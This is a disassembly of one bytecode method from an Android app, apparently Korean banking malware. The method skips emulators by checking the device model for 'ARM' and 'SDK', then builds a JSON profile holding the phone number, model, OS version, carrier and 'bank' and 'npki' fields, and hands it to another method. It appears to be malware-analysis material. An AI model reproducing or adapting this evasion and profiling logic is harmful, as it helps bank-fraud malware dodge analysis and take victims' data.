# Lkk/service/HUOLU$3;->run()V [access_flags=public]
#
# Parameters:
# local registers: v0...v6
#
# - return:void

run-BB@0x0 : [ run-BB@0x30 run-BB@0x32 ]
	0       (00000000) const/4              v5, -1
	1       (00000002) new-instance         v1, Lorg/json/JSONObject;
	2       (00000006) invoke-direct        v1, Lorg/json/JSONObject;-><init>()V
	3       (0000000c) iget-object          v3, v6, Lkk/service/HUOLU$3;->this$0 Lkk/service/HUOLU;
	4       (00000010) invoke-virtual       v3, Lkk/service/HUOLU;->getApplicationContext()Landroid/content/Context;
	5       (00000016) move-result-object   v3
	6       (00000018) invoke-static        v3, Lkk/util/StUtil;->getMachine(Landroid/content/Context;)Ljava/lang/String;
	7       (0000001e) move-result-object   v2
	8       (00000020) const-string         v3, '88'
	9       (00000024) invoke-virtual       v3, v2, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	10      (0000002a) move-result          v3
	11      (0000002c) if-eqz               v3, +3

run-BB@0x30 : 
	12      (00000030) return-void          

run-BB@0x32 : [ run-BB@0x64 run-BB@0x30 ]
	13      (00000032) const-string         v3, 'mobile'
	14      (00000036) iget-object          v4, v6, Lkk/service/HUOLU$3;->this$0 Lkk/service/HUOLU;
	15      (0000003a) invoke-virtual       v4, Lkk/service/HUOLU;->getApplicationContext()Landroid/content/Context;
	16      (00000040) move-result-object   v4
	17      (00000042) invoke-static        v4, Lkk/util/StUtil;->getMachine(Landroid/content/Context;)Ljava/lang/String;
	18      (00000048) move-result-object   v4
	19      (0000004a) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	20      (00000050) sget-object          v3, Landroid/os/Build;->MODEL Ljava/lang/String;
	21      (00000054) const-string         v4, 'ARM'
	22      (00000058) invoke-virtual       v3, v4, Ljava/lang/String;->indexOf(Ljava/lang/String;)I
	23      (0000005e) move-result          v3
	24      (00000060) if-ne                v3, v5, -18
	32:cf
	(Lorg/json/JSONException; -> d2 run-BB@0xd2)

run-BB@0x64 : [ run-BB@0x78 run-BB@0x30 ]
	25      (00000064) sget-object          v3, Landroid/os/Build;->MODEL Ljava/lang/String;
	26      (00000068) const-string         v4, 'SDK'
	27      (0000006c) invoke-virtual       v3, v4, Ljava/lang/String;->indexOf(Ljava/lang/String;)I
	28      (00000072) move-result          v3
	29      (00000074) if-ne                v3, v5, -22
	32:cf
	(Lorg/json/JSONException; -> d2 run-BB@0xd2)

run-BB@0x78 : [ run-BB@0x30 ]
	30      (00000078) const-string         v3, 'machine'
	31      (0000007c) sget-object          v4, Landroid/os/Build;->MODEL Ljava/lang/String;
	32      (00000080) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	33      (00000086) const-string         v3, 'sversion'
	34      (0000008a) sget-object          v4, Landroid/os/Build$VERSION;->RELEASE Ljava/lang/String;
	35      (0000008e) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	36      (00000094) const-string         v3, 'bank'
	37      (00000098) const-string         v4, ''
	38      (0000009c) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	39      (000000a2) const-string         v3, 'provider'
	40      (000000a6) iget-object          v4, v6, Lkk/service/HUOLU$3;->this$0 Lkk/service/HUOLU;
	41      (000000aa) invoke-static        v4, Lkk/util/NetUtil;->getProvidersName(Landroid/content/Context;)Ljava/lang/String;
	42      (000000b0) move-result-object   v4
	43      (000000b2) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	44      (000000b8) const-string         v3, 'npki'
	45      (000000bc) const-string         v4, '1'
	46      (000000c0) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	47      (000000c6) iget-object          v3, v6, Lkk/service/HUOLU$3;->this$0 Lkk/service/HUOLU;
	48      (000000ca) invoke-virtual       v3, v1, Lkk/service/HUOLU;->ff(Lorg/json/JSONObject;)V
	49      (000000d0) goto                 -50

run-BB@0xd2 : [ run-BB@0x30 ]
	50      (000000d2) move-exception       v0
	51      (000000d4) invoke-virtual       v0, Lorg/json/JSONException;->printStackTrace()V
	52      (000000da) goto                 -55

